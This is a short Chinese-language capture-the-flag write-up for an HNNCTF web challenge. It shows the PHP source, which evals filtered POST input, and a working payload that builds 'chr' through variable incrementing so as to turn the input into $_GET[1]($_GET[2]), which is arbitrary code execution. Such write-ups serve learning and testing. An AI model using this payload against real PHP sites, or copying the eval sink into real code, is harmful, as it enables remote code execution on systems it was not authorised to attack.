HNNCTF web-Challenge__rce(自增命令执行+限制长度)
<?php
error_reporting(0);
if (isset($_GET['hint'])) {
highlight_file(__FILE__);
}
if (isset($_POST['rce'])) {
$rce = $_POST['rce'];
if (strlen($rce) <= 120) {
if (is_string($rce)) {
if (!preg_match("/[!@#%^&*:'\-<?>\"\/|`a-zA-Z~\\\\]/", $rce)) {
eval($rce);
} else {
echo("Are you hack me?");
}
} else {
echo "I want string!";
}
} else {
echo "too long!";
}
}
话不多说,直接上payload先:
$_=[]._;$_3=$_[1];$_=$_[3];++$_;$_1=++$_;++$_;++$_;++$_;++$_;$_=$_1.++$_.$_3;$_=_.$_(71).$_(69).$_(84);$$_[1]($$_[2]);
翻译过来就是,$_GET[1]($_GET[2]);
重点在:$_=_.$_(71).$_(69).$_(84);这里先构造了chr函数:$_=$_1.++$_.$_3;($_=chr)